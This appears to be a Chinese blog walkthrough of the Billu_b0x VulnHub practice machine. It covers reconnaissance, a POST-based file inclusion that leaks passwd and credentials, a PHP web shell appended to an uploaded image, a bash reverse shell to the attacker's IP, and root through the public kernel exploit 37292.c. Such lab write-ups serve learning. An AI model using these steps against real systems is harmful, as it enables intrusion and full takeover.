环境搭建:
渗透机: kali 2021
靶机:Billu_b0x(来源vulhub:https://download.vulnhub.com/billu/Billu_b0x.zip)
准备工作
配置好桥接网并查看靶机MAC地址
信息收集
渗透怎能少了信息收集呢?信息收集做的好,渗透少不了。
利用arp-scan进行网段扫描,通过MAC地址00:0C:29:A8:A2:36成功搜寻到靶机IP
nmap工具进行探测信息:
利用 nmap -n -sS -p- IP 进行半连接扫描
进一步扫描: nmap -A -p- IP 发现只开放了22、80端口
dirb目录扫描
开放80端口,尝试利用dirb进行扫描全目录(搜寻敏感信息)
命令:
dirb http://IP/ /usr/share/wordlists/dirb/* (扫描更全)
扫描到一些关键目录,如add、c、test、show、index、phpmy等目录
通过80端口进一步利用---利用dirb进行扫描php文件
dirb http://IP/ -X .php
访问add目录
尝试第一步:访问 http://172.16.10.100/add,尝试利用
多次尝试无果,猜测可能该页面是纯静态页面,用来迷惑攻击者
访问test目录
提示:'file' parameter is empty. Please provide file path in 'file' parameter(“文件”参数为空。请在“文件”参数中提供文件路径 )
思路:猜测这里存在文件包含漏洞
文件包含利用
思路:访问test目录,尝试file=/etc/passwd 文件包含,发现无效
人生得选择那么多,不必撞了南墙还不回头,总有别的选择可以让你选择的~
转变思路:尝试POST请求文件包含,发现成功包含passwd文件
意外惊喜,看样子这种方式是成功的,同时发现了一个1000的ID ica,利用同样的方式查看add.php、in.php、c.php、index.php、show.php、panel.php等文件。
包含c.php
成功获取到信息 "billu","b0x_billu",但这个不是后台密码(徐晃一枪),进行尝试发现是phpmyadmin后台密码
访问phpmyadmin
渗透phpmy
思路:利用上面的用户名billu和密码b0x_billu 成功登录phpmyadmin,又找到一个用户密码
峰回路转,从网站初始进行渗透,利用用户密码成功登录后台
getshell
(思路一)文件包含反弹shell
利用上一步,通过用户密码成功登录后台,发现可以存在文件上传漏洞
漏洞利用:生成图片马进行利用,上传一句话GET请求图片木马
普通上传失败,网页显示上传失败。换一种思路,上传一张正常图片并在burp中抓包,在图片末尾加入
<?php system($_GET['cmd']);?>
执行语句(cmd.jpg)
成功上传,冲冲冲!上上burp进行改包,利用已上传的GET请求图片木马进行利用,发现可以成功
cat%20/etc/passwd 或 cat /etc/passwd
成功执行:
进一步利用:上传反弹shell回弹,需要进行url编码利用
反弹shell:
echo "bash -i >&/dev/tcp/172.16.9.200/3333 0>&1" | bash
继续利用burp文件包含,利用木马执行反弹语句,成功getshell
提权
思路:提权思路-37292.c
进入靶机后,发现是ubuntu系统是(Ubuntu 12.04.5 LTS)
python3 -m http.server 8081
searchsploit -m 37292.c
gcc 37292.c -o 37292
./37292 成功提权
(思路二)尝试包含config.inc.php文件
phpmyadmin的默认的配置文件是:config.inc.php,现在我们不知道路径,猜测路径在/var/www/phpmy下
利用curl 文件包含config.inc.php
成功获取到root用户和密码roottoor,可以直接ssh连接
一步搞定:利用 ssh root@IP (成功getshell,并且为root权限)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论